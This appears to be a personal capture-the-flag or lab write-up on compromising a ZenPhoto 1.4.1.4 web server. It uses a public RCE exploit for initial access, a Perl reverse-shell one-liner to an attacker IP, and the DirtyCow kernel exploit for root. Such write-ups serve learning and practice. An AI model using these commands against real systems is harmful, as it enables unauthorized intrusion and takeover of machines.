## Enumeration - Mysql - 3006 - ?? (unauthorized??) * CUPS 1.4 - 23 ?? * SSH - 22 ### Webserver - 80 HTTP Paths | Path | Note | | ------- | --------------------------------------- | | /test/ | Some gallery page (powered by zenphoto) | | /index/ | leads to front page | #### Zenphoto https://www.zenphoto.org/ >Simple website CMS Most recent version: ![[Pasted image 20250324162816.png]] Searchsploit reveals plenty of options here Source code inspections reveals: ![[Pasted image 20250324163026.png]] ## Initial Access (version 1.4.1.4) which straight up matches an RCE [CVE](https://nvd.nist.gov/vuln/detail/CVE-2011-4825): ```sh searchsploit zenphoto ... ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution | php/webapps/18083.php ... searchsploit -m 18083.php ``` CVE description: >Static code injection vulnerability in inc/function.base.php in Ajax File and Image Manager before 1.1, as used in tinymce before 1.4.2, phpMyFAQ 2.6 before 2.6.19 and 2.7 before 2.7.1, and possibly other products, allows remote attackers to inject arbitrary PHP code into data.php via crafted parameters Execution: ```sh php 18083.php $RHOST /test/ ``` And we get a reverse shell with some limited functionality. We can `cat /home/local.txt` for an initial flag, this took about 30 minutes. ## Foothold Due to the limited functionality of the exploit shell I'll be looking to upgrade: - no netcat available - we can execute `.sh` scripts - no success using reverse bash tcp scripts - we can run `bash` tho - we can run `wget` but this chrashes the exploit shell and leaves the file empty - all this could indicate that we gotta privesc manually This turns out to work just fine: ```sh perl -e 'use Socket;$i="192.168.45.231";$p=3006;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' python -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm ``` ## Privesc - no output from `sudo -l` - kernel version: `2.6.32-21-generic` - could be vulnerable to [this](https://www.exploit-db.com/exploits/14814) - `gcc` is available - but we still can't infill files - `ps aux` - no interesting procs sticking out - no passwords as command line args - nada in `crontab -l` - users - `saned` - homedir - possibly ssh - writable files: `find / -type f -writable 2>dev/null` - `/usr/bin/changeip` (??) - bunch of `/procs` ``` zenphoto-shell# cat /usr/bin/changeip #!/bin/bash cat /etc/network/interfaces |egrep -v "address|netmask|gateway|nameservers" > /tmp/ip echo address $1 >> /tmp/ip echo netmask $2 >> /tmp/ip mv -f /tmp/ip /etc/network/interfaces /etc/init.d/networking restart echo 127.0.0.1 localhost > /etc/hosts echo $1 $3 >>/etc/hosts history -c ``` - Looking for binaries with SUID bit set ``` zenphoto-shell# find / -perm -4000 -type f 2>/dev/null /bin/ping6 /bin/umount /bin/mount /bin/fusermount /bin/su /bin/ping /lib/dbus-1.0/dbus-daemon-launch-helper /usr/bin/sudo /usr/bin/gpasswd /usr/bin/lppasswd /usr/bin/chfn /usr/bin/mtr /usr/bin/X /usr/bin/sudoedit /usr/bin/newgrp /usr/bin/passwd /usr/bin/arping /usr/bin/at /usr/bin/chsh /usr/bin/traceroute6.iputils /usr/bin/pkexec /usr/lib/eject/dmcrypt-get-device /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/openssh/ssh-keysign /usr/lib/pt_chown /usr/sbin/pppd /usr/sbin/uuidd ``` ### Kernel Exploit Running `linpeas.sh` reveals that there's a high likelihood that the system is vulnerable to [dirtycow](https://github.com/firefart/dirtycow). We deploy it to the system. Compile it. Execute and get root. ## Lessons Learned - Took a hint concerning the reverse shell. Should have kept on trying reverse shells, the perl reverse shell would eventually have worked. - Got exhausted and took a hint. Quickly learned that we was dealing with a vulnerable kernel verison. Deployed firefart and got root. Overthought this one... again. - Got the initial access in like 15 minutes.